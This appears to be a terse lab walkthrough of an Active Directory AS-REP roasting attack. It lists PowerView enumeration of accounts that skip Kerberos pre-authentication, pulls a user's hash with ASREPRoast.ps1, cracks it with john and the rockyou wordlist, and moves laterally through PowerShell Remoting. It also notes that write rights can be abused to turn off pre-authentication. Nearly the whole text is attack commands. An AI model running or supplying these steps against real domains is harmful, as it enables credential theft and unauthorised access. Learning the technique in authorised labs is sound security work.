To do asrep roasting we must have the don’t require pre-auth on
if we have generic write and generic all we can force disable pre-auth to perform asrep roasting
enumerating accounts with Kerberos pre-auth disabled
Get-NetUser -PreauthNotRequired -Verbose
now let’s apply some filters
Get-NetUser -PreauthNotRequired -Verbose | select cn,samaccountname
we will get the hash of one user after that we will script the others
. .\\ASREPRoast.ps1
Get-ASREPHash -UserName peria.elisa -Verbose
now let’s try to crack it
john crackme.txt --wordlist=/usr/share/wordlists/rockyou.txt
as we see we cracked the password for the user peria
now do you wanna try to lateral move with this let’s try PowerShell Remoting
Enable-PSRemoting #local admin privs requiered
Enter-PSSession -ComputerName WIN-Q4788GPE9L7 -Credential Get-Credential